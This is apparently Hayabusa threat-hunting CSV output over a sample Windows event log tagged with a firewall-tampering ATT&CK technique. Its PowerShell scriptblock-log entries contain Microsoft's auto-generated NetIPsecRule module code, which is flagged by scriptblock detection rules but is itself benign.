$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' -Alias '*' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, 
[Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Binding",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"} } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' -Alias '*' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] 
[ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' -Alias '*' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = 
[System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Binding",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule 
activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"s = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' -Alias '*' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] 
[ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
